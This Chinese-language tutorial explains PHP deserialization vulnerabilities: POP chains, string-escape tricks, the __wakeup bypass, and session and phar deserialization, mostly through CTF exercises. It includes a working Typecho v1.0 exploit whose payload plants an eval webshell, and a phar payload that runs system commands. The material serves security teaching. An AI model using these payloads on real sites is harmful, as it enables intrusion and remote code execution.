PHP中的反序列化漏洞

PHP中的反序列化漏洞

目录

  • PHP 中的序列化与反序列化

    • 概述

    • 序列化

      • 基本类型的序列化

      • 对象的序列化

    • 反序列化

    • 示例序列化与反序列化

  • 反序列化漏洞

    • - PHP 中的魔术方法

    • - Typecho_v1.0 中的反序列化漏洞

  • POP链的构造思路

    • pop链案例

    • 反序列化逃逸

      • 字符串逃逸(减少)

      • 字符串逃逸(增多)

      • 字符串逃逸(增多案例)

      • 字符串逃逸(减少案例)

  • weakup魔法函数的绕过

    • 漏洞产生原因

    • 案例

  • session反序列化

    • session存取数据的格式

      • 1、php存储方式

      • 2、php_serialize存储方式

      • 3、php_binary存储方式

    • PHP session反序列化漏洞

      • 案例一:

      • 案例二:

  • Phar反序列化

    • 什么是Phar

    • Phar文件的结构

    • Phar漏洞原理

    • phar漏洞利用案例

      • 案例一:

      • 案例二:

    • Phar使用条件总结

PHP 中的序列化与反序列化

概述

PHP 反序列化漏洞也叫 PHP 对象注入,是一个常见的漏洞,这种类型的漏洞虽然有些难以利用,但一旦利用成功就会造成非常危险的后果。

漏洞的形成的根本原因是程序没有对用户输入的反序列化字符串进行检测,导致反序列化过程可以被恶意控制,进而造成代码执行、getshell 等一系列不可控的后果。

反序列化漏洞并不是 PHP 特有,也存在于 Java、Python 等语言之中,但其原理基本相通。

PHP 中的序列化与反序列化,基本都是围绕 serialize() unserialize() 两个函数展开的。

序列化

基本类型的序列化
类型示例序列化后的格式
nullnullN;
整型123i:123;
浮点型3.14159d:3.1415899999999999
字符串“leyilea”s:7:“leyilea”;
布尔型trueb:1;
falseb:0;
数组array(1,true,“leyilea”);a:3:{i:0;i:1;i:1;b:1;i:2;s:7:“leyilea”;}
对象的序列化

不同属性序列化的区别

<?phpclass Person{private $name = "leyilea";  // 私有属性public $age = 18;        // 公有属性protected $add = "bj";   // 受保护的属性public function test(){echo "hello".$this->name;}
}$a=new Person();
echo serialize($a);
  • 成员方法不会被序列化
  • 私有属性序列化后会在变量名前加%00类名%00
  • 受保护的属性序列化后会在变量名前加%00*%00
O:6:"Person":3:{s:12:" %00 Person %00 name";s:7:"leyilea";s:3:"age";i:18;s:6:" %00*%00 add";s:2:"bj";}

一个对象在实例化一个类的时候,调用了另一个类实例化的对象。

<?php
class Person{public $age = 18;
}
class Test{var $a;function __construct(){$this->a = new Person();}
}$a=new Test();
echo serialize($a);

序列化的结果:

O:4:"Test":1:{s:1:"a"; O:6:"Person":1:{s:3:"age";i:18;} }

反序列化

反序列化生成对象的值,由反序列化里的值提供,与原有类预定义的值无关。

<?php
class Person{public $name = "leyilea";private $age = 18;protected $add = "bj";public function test(){echo "hello".$this->name;}
}
$a = 'O:6:"Person":1:{s:4:"name";s:8:"system()";}';
var_dump(unserialize($a));

反序列化之后的结果:

object(Person)#1 (3) {["name"]=>string(8) "system()"["age":"Person":private]=>int(18)["add":protected]=>string(2) "bj"
}

反序列化不触发类的成员方法(不包含魔术方法),需要调用才会触发。

示例序列化与反序列化

序列化会将一个抽象的对象转换为字符串。

首先创建一个类:

<?php
class Student{public $name;public $sex;public $age;public $score;
}
?>

类名是 Stuent,该类中有四个变量,将这个类实例化(创建一个对象), 将对象序列化为字符串:(当我们直接输出 $stu1 时会 error,对象无法转换为字符串)

<?php
$stu1 = new Student();
$stu1 ->name = "tom";
$stu1 ->sex = true; 
$stu1 ->age = 18;
$stu1 ->score = 89.9;
echo serialize($stu1);
?>

运行结果:

O:7:"Student":4:    # Object:类名长度为7:"类名为Student":4个属性
{s:4:"name";s:3:"tom";s:3:"sex";b:1;s:3:"age";i:18;s:5:"score";d:89.900000000000006;}
{string:属性1长度:"属性1";.....}

反序列化:

$str =<<<HTML
O:7:"Student":4:{s:4:"name";s:3:"tom";s:3:"sex";b:1;s:3:"age";i:18;s:5:"score";d:89.900000000000006;}
HTML;
var_dump(unserialize($str));

运行结果:

object(Student)#2 (4) {["name"]=>string(3) "tom"["sex"]=>bool(true)["age"]=>int(18)["score"]=>float(89.9)
}

整体代码:

<?php
class Student{public $name;public $sex;public $age;public $score;
};
$stu1 = new Student();
$stu1 ->name = "tom";
$stu1 ->sex = true;
$stu1 ->age = 18;
$stu1 ->score = 89.9;
var_dump($stu1);
echo "<hr />";
echo serialize($stu1);  //序列化$str =<<<HTML
O:7:"Student":4:{s:4:"name";s:3:"tom";s:3:"sex";b:1;s:3:"age";i:18;s:5:"score";d:89.900000000000006;}
HTML;
echo "<hr />";
var_dump(unserialize($str)); //反序列化
?>

请添加图片描述

反序列化漏洞

这里我们定义一个类,一个属性,一个方法,由于反序列化要使用序列化后的字符串比较麻烦,我们可以将序列化的结果用一个变量接收 $t

<?php
class Test{public $str = "hello";function __destruct(){@eval($this -> str);}
}$test = new Test();
$t = serialize($test);
echo $t;
echo "<hr />";
var_dump(unserialize($t));
?>

运行结果:
在这里插入图片描述

那么我们是不是可以修改变量 $t 为一个更灵活的方式 $_GET[obj] ,然后可以通过 obj 赋值:

<?php
<?php
class Test{public $str = "hello";function __destruct(){@eval($this -> str);}
}$test = new Test();
echo serialize($test);
echo "<hr />";
$t = $_GET['obj'];
echo $t;
echo "<hr />";
var_dump(unserialize($t));   //反序列化生成一个对象
?>

赋值并运行:
在这里插入图片描述

如果我们修改其中的值:修改为 phpinfo()
在这里插入图片描述

结果:为我们编译了 phpinfo()

查找原因:该类中只有一个方法 __destruct(),方法中有一个函数 eval,所以只可能是它,但我们并没有去调用该方法,它是怎么执行的?

PHP 中的析构函数(destruct),当对象结束其生命周期时,系统自动执行析构函数;它与构造函数(construct)刚好相反,构造函数是在对象创建时自动调用。

- PHP 中的魔术方法

__ 开头的方法,是 PHP 中的魔术方法,类中的魔术方法,在特定情况下会被自动调用。主要魔术方法如下。

__construct()              在创建对象时自动调用
__destruct()               在销毁对象时自动调用
__call()                   在对象中调用一个不可访问方法时,call() 会被调用
__callStatic()             在静态上下文中调用一个不可访问方法时调用
__get()                    读取不可访问属性的值时会被调用
__set()                    在给不可访问属性赋值时会被调用
__isset()                  当对不可访问属性调用isset() 或empty()时会被调用
__unset()                  当对不可访问属性调用unset() 时会被调用
__sleep()                  serialize()函数会检查类中是否存在一个魔术方法__sleep(),如果存在,该方法会先被调用,然后才执行序列化操作
__wakeup()                 unserialize()函数会检查是否存在一个__wakeup() 方法,如果存在,则会先调用__wakeup方法,预先准备对象需要的资源。
__toString( )              toString()方法用于一个类被当成字符串时应怎样回应。
__invoke()                 当尝试以调用函数的方式调用一个对象时会被自动调用
_set_state()               自PHP 5.1.0起当调用var_export()导出类时,此静态方法会被调用。
__clone()                  当复制完成时,如果定义了__clone() 方法,则新创建的对象(复制生成的对象)中的__clone()方法会被调用,可用于修改属性的值(如果有必要的话)。

参考:https://www.freebuf.com/articles/web/167721.html

- Typecho_v1.0 中的反序列化漏洞
  1. 搭建网站(需要手动创建数据库)http://typecho.org/

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

  1. 我们使用 exp 生成反序列化后的对象 (字符串),并且进行 base64 编码。

    EXP 代码:

    <?php
    class Typecho_Feed{const RSS1 = 'RSS 1.0';const RSS2 = 'RSS 2.0';const ATOM1 = 'ATOM 1.0';const DATE_RFC822 = 'r';const DATE_W3CDTF = 'c';const EOL = "\n";private $_type;private $_items;public function __construct(){$this->_type = $this::RSS2;$this->_items[0] = array('title' => '1','link' => '1','date' => 1508895132,'category' => array(new Typecho_Request()),'author' => new Typecho_Request(),);}
    }class Typecho_Request{private $_params = array();private $_filter = array();public function __construct(){$this->_params['screenName'] = 'phpinfo()';$this->_filter[0] = 'assert';}
    }$exp = array('adapter' => new Typecho_Feed(),'prefix' => 'typecho_'
    );echo base64_encode(serialize($exp));
    ?>

    生成的 poc:

    YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUwODg5NTEzMjtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fXM6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30=
  2. 漏洞存在

    我们将 poc 代码赋值给 __typecho_config 变量,然后通过 POST 方式提交到链接 http://192.168.40.129/Typechov1/install.php?finish= ,并且设置 Referer=http://192.168.40.129/typechov11/

    成功弹出 phpinfo 界面。

  3. 注入一句话木马

    $this->_params['screenName'] = "fputs(fopen('shell.php','w'),'<?php @eval(\$_REQUEST[777])?>')";

    再次生成 POC,注入参数:

  4. 成功生成 shell.php,使用中国蚁剑连接

POP链的构造思路

pop链案例

<?php
class Modifier{private $var;public function append($value){include($value);echo $flag;}public function __invoke(){$this->append($this->var);}
}class Show{public $source;public $str;public function __toString(){return $this->str->source;}public function __wakeup(){echo $this->source;}
}class Test{public $p;public function __construst(){$this->p=array();}public function __get($key){$function=$this->p;return $function();}
}if(isset($_GET['pop'])){echo $_GET['pop'];unserialize($_GET['pop']);
}highlight_file(__FILE__);
error_reporting(0);
?>

构造payload

<?php
class Modifier{private $var="flag.php";
}class Show{public $source;public $str;
}class Test{public $p;
}$a = new Modifier();
$b = new Show();
$c = new Test();
$c->p = $a;
$b->source = $b;
$b->str = $c;echo serialize($b);?>

反序列化逃逸

反序列化分隔符

  • 反序列化以;}结束,后面的字符串不影响正常的反序列化。

属性逃逸

  • 一般在数据先经过一次serialize再经过unserialize,在这个中间反序列化的字符串变多或者变少的时候有可能存在反序列化属性逃逸。

反序列化的几个特性:

<?php
$flag = "flag{1uiodjkahsdou1q}";class A{public $v1 = "a";
}
echo serialize(new A());
// O:1:"A":1:{s:2:"v1";s:1:"a";}$b = 'O:1:"A":1:{s:2:"v1";s:1:"a";s:2:"v2";N;}';
var_dump(unserialize($b));
// bool(false) 因为成员数量不对$b = 'O:1:"A": 2 :{s:2:"v1";s:1:"a";s:2:"v2";N;}';
var_dump(unserialize($b));
// 正常执行$b = 'O:1:"A":2:{s:2:"v1";s:1:"a";s: 5 :"v2";N;}';
var_dump(unserialize($b));
// bool(false) 因为长度值和实际长度不一致$b = 'O:1:"A":2:{s:2:"v1";s:1:"a";s:2:"v2";N;} s:2:"v2";N;} ';
var_dump(unserialize($b));
// 正常执行,在前面字符串没有问题的情况下,;}是反序列化结束符,后面的字符串不影响反序列化结果
<?php
$flag = "flag{1uiodjkahsdou1q}";class A{public $v1 = "a\"b";
}
echo serialize(new A());
// O:1:"A":1:{s:2:"v1";s: 3 :"a " b";}
// 引号是字符还是格式字符,由前面的长度3来确定

属性逃逸

一般在数据先经过一次seralize再经过unserialize,在这个中间反序列化的字符串变多或者变少的时候才有可能存在反序列化属性逃逸。

字符串逃逸(减少)

反序列化字符串减少逃逸;多逃逸出一个成员属性。第一个字符串减少,吃掉有效代码,在第二个字符串构造代码。

<?php
class A{public $v1 = "hellosystem()";public $v2 = "666";
}$data = serialize(new A());
$data = str_replace("system()","",$data);  // 将system()替换为空
echo $data;
?>
O:1:"A":2:{s:2:"v1";s:13:"hellosystem()";s:2:"v2";s:3:"666";} 
// 经过替换,字符串如下
O:1:"A":2:{s:2:"v1";s:13:" hello";s:2:"v 2";s:3:" 666 ";} 
// 字符串缺失,导致结构被破坏,反序列化不成功// 通过此特点(字符串减少),进行逃逸
O:1:"A":2:{s:2:"v1";s: ? :"hello";s:2:"v2";s: XX :" ";s:2:"v3";s:3:"123 ";} 
// 先补充要逃逸的功能性代码(比如这里要逃逸出v3属性)
// 然后需要多吃几个字符,使功能性代码进行反序列化O:1:"A":2:{s:2:"v1";s: ? :"hello";s:2:"v2";s: 19 :" ";s:2:"v3";s:3:"123 ";}O:1:"A":2:{s:2:"v1";s: ? :" hello";s:2:"v2";s:19:" ";s:2:"v3";s:3:"123";} 
// 加上原有的 hello,一共需要吃掉22个字符
// 一个system()是8个字符,加上 hello的5个字符
// 所以最少需要3个system(),这样就需要吃掉 3*8+5= 29 个字符
O:1:"A":2:{s:2:"v1";s: 29 :" hello system()system()system() ";s:2:"v2";s:19:"";s:2:" v3";s:3:"123";}
// 这样 比之前的22个字符多了7个字符,这7个字符是多吃掉的,所以需要再后面多补7个字符
O:1:"A":2:{s:2:"v1";s: 29 :" hello system()system()system() ";s:2:"v2";s:19:" 1234567 ";s:2:"v3";s:3:"123";}
// 最终过滤了system()后剩下的内容,刚好能够反序列化自己构造的功能性代码
O:1:"A":2:{s:2:"v1";s: 29 :" hello";s:2:"v2";s:19:" 1234567 ";s:2:"v3";s:3:"123";}
<?php
class A{public $v1 = "hellosystem()";public $v2 = "666";public function __construct($arga,$argb){$this->v1 = $arga;$this->v2 = $argb;}
}
$a = $_GET['v1'];
$b = $_GET['v2'];
$data = serialize(new A());
$data = str_replace("system()","",$data);  // 将system()替换为空
echo $data;var_dump(unserialize($data));highlight_file(__FILE__);
error_reporting(0);
?>

在这里插入图片描述

字符串逃逸(增多)

反序列化字符串增多逃逸;构造一个逃逸成员属性。第一个字符串增多,吐出多余代码,把多余代码构造成逃逸的成员属性。

<?php
class A{public $v1 = "ls";public $v2 = "666";
}$data = serialize(new A());
$data = str_replace("ls","pwd",$data);  // 将ls替换为pwd
echo $data;
?>

未经过替换的序列化字符串为:

O:1:"A":2:{s:2:"v1";s:2:"pwd";s:2:"v2";s:3:"666";}

经过替换后的字符串为:

O:1:"A":2:{s:2:"v1";s:2:" pw d";s:2:"v2";s:3:"666";}

字符串增多,导致结构被破坏,反序列化不成功。

通过此特点(字符串增多),进行逃逸:

O:1:"A":2:{s:2:"v1";s: ? :" ls ";s:2:"v3";s:3:"123";} ";s:2:"v2";s:3:"666";}

先构造出完整的逃逸属性,如上。

因为一个ls替换为pwd,会多出1个字符。构造出的逃逸属性需要22个字符。所以需要22个ls。即:

O:1:"A":2:{s:2:"v1";s: ? :" lslslslslslslslslslslslslslslslslslslslslsls ";s:2:"v3";s:3:"123";} ";s:2:"v2";s:3:"666";}

则v1的字符串长度为 2*22+22=65。即

O:1:"A":2:{s:2:"v1";s: 65 :" lslslslslslslslslslslslslslslslslslslslslsls ";s:2:"v3";s:3:"123";} ";s:2:"v2";s:3:"666";}

经字符串替换后为:

O:1:"A":2:{s:2:"v1";s: 63 :" pwdpwdpwdpwdpwdpwdpwdpwdpwdpwdpwdpwdpwdpwdpwdpwdpwdpwdpwdpwdpwd ";s:2:"v3";s:3:"123";} ";s:2:"v2";s:3:"666";}

此时v3会被逃逸出来,因为构造的v3字符串后有;},反序列化时会认为结束。

<?php
class A{public $v1 = "ls";public $v2 = "666";public function __construct($arga,$argb){$this->v1 = $arga;$this->v2 = $argb;}
}
$a = $_GET['v1'];
$b = $_GET['v2'];
$data = serialize(new A($a,$b));
$data = str_replace("ls","pwd",$data);  // 将ls替换为pwd
echo $data;var_dump(unserialize($data));highlight_file(__FILE__);
error_reporting(0);
?>

最终反序列化的结果为:
在这里插入图片描述

字符串逃逸(增多案例)

<?php
function filter($str){$safe = array("flag","php");$str = str_replace($safe,"hack","$str"); // 将flag和php替换为hackreturn $str;
}class Test{var $user;var $pass = 'daydream';function __construst(){$this->user = $user;}
}$param = $_GET['param'];
$param = serialize(new Test($param));
$profile = unserialize(filter($param));if($profile->pass=='escaping'){echo file_get_contents("flag.php");
}highlight_file(__FILE__);
error_reporting(0);
?>

因为题目将flag和php替换为hack,其中flag替换为hack没有发生增多或者减少的变化,所以不能用于逃逸,只能利用php替换hack,一个php替换为hack增多1个字符,所以按照字符串增多的方式逃逸。

根据题意,使用以下代码生成对应的序列化字符串。

<?php
class Test
{var $user = 'a';var $pass = 'daydream';
}
echo serialize(new Test());
O:4:"Test":2:{s:4:"user";s:1:"a";s:4:"pass";s:8:"daydream";}

补全需要逃逸的属性:

O:4:"Test":2:{s:4:"user";s:1:"a ";s:4:"pass";s:8:"escaping";} ";s:4:"pass";s:8:"daydream";}

需要逃逸出29个字符,那就需要29个php:

O:4:"Test":2:{s:4:"user";s: 116 :" phpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphp ";s:4:"pass";s:8:"escaping";} ";s:4:"pass";s:8:"daydream";}

替换为hack后为:

O:4:"Test":2:{s:4:"user";s: 116 :" hackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhack ";s:4:"pass";s:8:"escaping";} ";s:4:"pass";s:8:"daydream";}

pass属性被逃逸出来。
在这里插入图片描述

字符串逃逸(减少案例)

<?php
function filter($str){$safe = array("flag","php");$str = str_replace($safe,"bj","$str"); // 将falg和php替换为bjreturn $str;
}class Test{var $user;var $pass = 'daydream';var $vip = false;function __construct($user,$pass){$this->user = $user;$this->pass = $pass;}
}$user = $_GET['user'];
$pass = $_GET['pass'];
$param = serialize(new Test($user,$pass));
$profile = unserialize(filter($param));if($profile->vip){echo "flag";echo file_get_contents("flag.php");
}highlight_file(__FILE__);
error_reporting(0);
?>
<?php
class Test{var $user = 'a';var $pass = 'daydream';var $vip = false;
}echo serialize(new Test());
O:4:"Test":3:{s:4:"user";s:1:"a";s:4:"pass";s:8:"daydream";s:3:"vip";b:0;}

因为题目将flag和php替换为bj,利用php替换bj,一个php替换为hack减少1个字符,所以按照字符串减少的方式逃逸。

O:4:"Test":3:{s:4:"user";s:1:"a";s:4:"pass";s:8:"daydream";s:3:"vip";b:0;}

把需要逃逸的字符串补全(注意不能落下pass,因为需要属性有3个):

O:4:"Test":3:{s:4:"user";s:1:"a ";s:4:"pass";s:30:" ";s:4:"pass";N;s:3:"vip";b:1;} ";s:3:"vip";b:0;}

需要逃逸出19个字符,那就需要19个php。

O:4:"Test":3:{s:4:"user";s: 76 :" phpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphpphp ";s:4:"pass";s:30:" ";s:4:"pass";N;s:3:"vip";b:1;} ";s:3:"vip";b:0;}

替换为bj后为:

O:4:"Test":3:{s:4:"user";s: 76 :" bjbjbjbjbjbjbjbjbjbjbjbjbjbjbjbjbjbjbjbjbjbjbjbj";s:4:"pass";s:30:" ";s:4:"pass";N;s:3:"vip";b:1;} ";s:3:"vip";b:0;}

vip属性被逃逸出来。
在这里插入图片描述

weakup魔法函数的绕过

漏洞产生原因

如果存在__wakeup方法,调用unserilize()方法前则先调用__wakeup()方法,但是序列化字符串中表示对象属性个数的值大于真实的属性个数时,会跳过__wakeup()的执行。

漏洞编号:CVE-2016-7124

影响版本:PHP5<5.6.25;PHP7<7.0.10

案例
<?php
error_reporting(0);
class secret{var $file = 'index.php';function __construct($file){$this->file = $file;}function __destruct(){include_once($this->file);echo $flag;}function __wakeup(){$this->file='index.php';}
}$cmd = $_GET['cmd'];
if(!isset($cmd)){highlight_file(__FILE__);
}else{if(preg_match('/[oc]:\d+/i',$cmd)){echo "Are you daydreaming?";}else{unserialize($cmd);}
}
?>

构造反序列化字符串payload

<?php
class secret{var $file = 'flag.php';
}echo serialize(new secret());

得到反序列化字符串如下:

O:6:"secret":1:{s:4:"file";s:8:"flag.php";}

将字符串进行修改(将属性数量修改为2,绕过weakup方法):

O:6:"secret": 2 :{s:4:"file";s:8:"flag.php";}

题目中通过正则过滤了o:后面直接加数字的情况,可以通过添加+号绕过。

O: + 6:"secret":2:{s:4:"file";s:8:"flag.php";}

然后进行url编码:

<?php
echo urlencode('O:+6:"secret":2:{s:4:"file";s:8:"flag.php";}');

得到payload:

O%3A%2B6%3A%22secret%22%3A2%3A%7Bs%3A4%3A%22file%22%3Bs%3A8%3A%22flag.php%22%3B%7D

提交给页面,获得flag
在这里插入图片描述

session反序列化

当session_start()被调用或者php.ini之后session.auto_start为1时,PHP内部调用会话管理器,访问用户session被序列化以后,存储到指定目录(默认为/tmp)。

存取数据的格式有多种,常用的有三种:
在这里插入图片描述

漏洞产生原因:写入格式和读取格式不一致。

session存取数据的格式

1、php存储方式
<?php
session_start();
$_SESSION['aaa'] = $_GET['a'];
?>

在这里插入图片描述
在这里插入图片描述

存储的格式:

aaa|s:6:"123456";
2、php_serialize存储方式
<?php
ini_set('session.serialize_handler','php_serialize');  // 指定存储方式为php_serialize
session_start();$_SESSION['aaa'] = $_GET['a'];
$_SESSION['bbb'] = $_GET['b'];
?>

在这里插入图片描述
在这里插入图片描述

存储的格式:

a:2:{s:3:"aaa";s:6:"123456";s:3:"bbb";s:8:"zhangsan";}

相当于对数组的序列化格式:

$b = array("aaa"=>"123456","bbb"=>"zhangsan"
);
echo serialize($b);
3、php_binary存储方式
<?php
ini_set('session.serialize_handler','php_binary');
session_start();$_SESSION['aaa'] = $_GET['a'];
$_SESSION['bbb'] = $_GET['b'];?>

在这里插入图片描述

在这里插入图片描述

存储的格式:

 . aaas:6:"123456"; . bbbs:8:"zhangsan";

使用010editer查看该session文件:(前面的字符为二进制的键名长度)
在这里插入图片描述

PHP session反序列化漏洞

当网站序列化并存储session,与反序列化并读取session的方式不同,就可能导致session反序列化漏洞的产生。

案例一:

save.php(存储session)

<?php
ini_set("session.serialize_handler","php_serialize");
session_start();
$_SESSION['aaa'] = $_GET['a'];?>

vul.php(读取session)

<?php
ini_set("session.serialize_handler","php");
session_start();
class A{var $a;function __destruct(){eval($this->a);}
}
?>

在这里插入图片描述

存储的session为:

a:1:{s:3:"aaa";s:37:"| O:1:"A":1:{s:1:"a";s:10:"phpinfo();";}" ;}

访问vul.php,session进行读取,触发反序列化,将O:1:"A":1:{s:1:"a";s:10:"phpinfo();";}"进行反序列化,成功执行eval(“phpinfo()”);

  • 因为php方式的session存储,在读取时会对|后面的内容进行反序列化。
    在这里插入图片描述
案例二:

demo03.php

<?php
// 另一个页面:hint.php
session_start();
class Flag{public $name;public $her;function __wakeup(){$this->her=md5(rand(1,1000));if($this->name===$this->her){include("flag.php");echo $flag;}}
}highlight_file(__FILE__);
error_reporting(0);
?>

hint.php

<?php
ini_set("session.serialize_handler","php_serialize");
session_start();
$_SESSION['aaa'] = $_GET['a'];highlight_file(__FILE__);
error_reporting(0);
?>

构造序列化数据:

  • 因为题目要求$name和$her需要全等,所以这里需要采用引用的方式
<?php
class Flag{public $name;public $her;
}$a = new Flag();
$a->name = &$a->her;   // 引用
echo serialize($a);

序列化出来的数据为:

O:4:"Flag":2:{s:4:"name";N;s:3:"her";R:2;}

通过hint.php页面存储session,因为读取session数据的方式为默认的PHP方式,所以在传入数据时在前面加|
在这里插入图片描述

然后访问页面,成功读取flag。
在这里插入图片描述

Phar反序列化

什么是Phar

JAR是开发Java程序一个应用,包括所有的可执行、可访问的文件,都打包进了一个JAR文件里,使得部署过程十分简单。

PHAR(“PHP ARchive”)是PHP里类似于JAR的一种打包文件。对于PHP5.3或更高版本,Phar后缀文件是默认开启支持的,可以直接使用它。

文件包含:phar伪协议,可读取.phar文件。

Phar文件的结构

  • stub phar文件标识,格式为xxx<?php xxx;__HALT_COMPILER(); ?>(头部信息)
  • manifest 压缩文件的属性等信息,以序列化存储;
  • contents压缩文件的内容;
  • signature签名,放在文件末尾。

Phar协议解析文件时,会自动触发对manifest字段的序列化字符串进行反序列化。
在这里插入图片描述

在这里插入图片描述

Phar漏洞原理

  • manifest压缩文件的属性等信息,以序列化存储;存在一段序列化的字符串;
  • 调用phar伪协议,可读取.phar文件;
  • Phar协议解析文件时,会自动触发对manifest字段的序列化字符串进行反序列化。
  • Phar需要PHP≥5.2,在php.ini中将phar.readonly设为Off(注意删掉前面的分号)

受影响的函数
在这里插入图片描述

phar漏洞利用案例

案例一:

存在phar反序列化漏洞的代码:

<?php
highlight_file(__FILE__);class TestObj{var $output = "echo 'OK';";function __destruct(){eval($this->output);}
}if(isset($_GET['filename'])){$filename=$_GET['filename'];var_dump(file_exists($filename)); 
}

生成phar文件的模版代码:

<?php
class TestObj{var $output='';
}@unlink('test.phar');  // 删除之前的test.phar文件(如果有)
$phar = new Phar('test.phar'); // 创建一个phar对象,文件名必须以phar为后缀
$phar->startBuffering();  // 开始写文件
$phar->getSize('<?php __HALT_COMPLIER(); ?>');  // 写入stub$o = new TestObj();
$o->output='eval($_GET["a"]);';$phar->setMetadata($o);  // 写入meta-data
$phar->addFromString("test.txt","test"); // 添加要压缩的文件
$phar->stopBuffering();
?>

浏览器访问

http://xxoo.com/a/usePhar.php?filename=phar://test.phar&a=system(%27ls%27);

在这里插入图片描述

1、file_exists()函数有文件包含的功能,可调用phar伪协议读取phar文件(test.phar)

2、phar协议解析文件时,会自动触发manifest字段的序列化字符串进行反序列化

3、反序列化将触发__destruct(),执行eval($this->output);eval('eval($_GET["a"]);');eval($_GET["a"]);

4、通过参数a传入需要执行的代码“system('ls');”等,成功执行。

案例二:
<?php
class TestObject{public function __destruct(){include('flag.php');echo $flag;}
}$filename = $_POST['file'];
if(isset($filename)){echo md5_file($filename);
}

Phar使用条件总结

1、phar文件能上传到服务器端;(可以利用上传功能,文件后缀可以不是.phar)

2、要有可用反序列化魔术方法作为跳板;

3、要有文件操作函数,如file_exists(),fopen(),file_get_contents()

4、文件操作函数参数可控,且:/phar等特殊字符没有被过滤

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/746588.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Linux安装使用one-api 格式访问所有的大模型

One API ✨ 通过标准的 OpenAI API 格式访问所有的大模型&#xff0c;开箱即用 ✨ [!NOTE] 本项目为开源项目&#xff0c;使用者必须在遵循 OpenAI 的使用条款以及法律法规的情况下使用&#xff0c;不得用于非法用途。 根据《生成式人工智能服务管理暂行办法》的要求&#xff…

Android 音频系统

导入 早期Linux版本采用的是OSS框架&#xff0c;它也是Unix及类Unix系统中广泛使用的一种音频体系。 ALSA是Linux社区为了取代OSS而提出的一种框架&#xff0c;是一个源代码完全开放的系统(遵循GNU GPL和GNU LGPL)。ALSA在Kernel 2.5版本中被正式引入后&#xff0c;OSS就逐步…

代码随想录day20(2)二叉树:完全二叉树节点个数(leetcode222)

题目要求&#xff1a;求一个完全二叉树的节点个数 思路&#xff1a;首先完全二叉树可以用普通二叉树的方法来求&#xff0c;但是需要遍历所有的节点。 但是对于完全二叉树来说&#xff0c;只有最底层右侧的节点可能没满&#xff0c;其余每层节点都达到了最大值。所以我们可以…

智慧城管:街面秩序沿街商铺视频可视化AI智能监管方案

一、背景分析 随着城市化的加速和商业活动的日益繁荣&#xff0c;沿街商铺的管理面临着越来越多的挑战。沿街商户的乱堆乱放、占道经营、违章停车等违法行为&#xff0c;一直以来都是城市管理中的难题。这不仅存在交通安全隐患&#xff0c;也造成了市容秩序混乱&#xff0c;严…

MFMailComposeViewController 发送邮件

通过 MFMailComposeViewController 发送邮件,需预先登录邮箱账号的情况下; 具体实现与配置参数请参考如下: 首先,引入 MFMailComposeViewController 库 #import <MessageUI/MessageUI.h> 其次,实现相关 api 方法 if ([MFMailComposeViewController canSendMail]) {MFM…

整型变量的原子操作

什么是原子操作 原子操作&#xff08;Atomic Operation&#xff09;是指不可中断的操作&#xff0c;即在多线程环境下&#xff0c;当一个线程在执行原子操作时&#xff0c;不会被其他线程的调度和中断所影响。这种操作在多线程编程中尤为重要&#xff0c;因为它能保证操作的原…

从零开始搭建医保购药APP:技术选择与开发流程

医保购药APP作为一种创新的医疗服务工具&#xff0c;为用户提供了便捷的医保购药流程&#xff0c;同时也为医疗机构提供了更高效的管理和服务方式。今天小编将为大家讲解如何从零开始搭建一款医保购药APP&#xff0c;包括技术选择和开发流程。 一、技术选择 在搭建医保购药APP…

openssl3.2 - note - Decoders and Encoders with OpenSSL

文章目录 openssl3.2 - note - Decoders and Encoders with OpenSSL概述笔记编码器/解码器的调用链OSSL_STORE 编码器/解码器的名称和属性OSSL_FUNC_decoder_freectx_fnOSSL_FUNC_encoder_encode_fn官方文档END openssl3.2 - note - Decoders and Encoders with OpenSSL 概述 …

js-循环返回多条数据,每条数据文本超过三行进行展开与收起的实现

1.基本需求 返回多条数据&#xff0c;每条数据在一定宽度的盒子内&#xff0c;文本超过三行进行文本的展开与收起 2.实现逻辑 对于返回的每条数据添加属性expend&#xff1a;false来在循环中进行对于展开收起的判断。 动态计算盒子宽度随着分辨率的变化而变化的值boxWidth。获…

基于单片机的智能环境监测系统

摘 要 本设计主要由温湿度检测、烟雾检测电路、报警电路、显示电路和人体检测等模块组成。温湿度检测部分使用的是DHT11这种型号的温湿度传感器。DHT11是一种单总线型数字式温湿度传感器&#xff0c;它具有误差小、分辨率高、抗干扰能力强等特点。在烟雾检测电路模块当中&…

Nginx 隐藏版本号

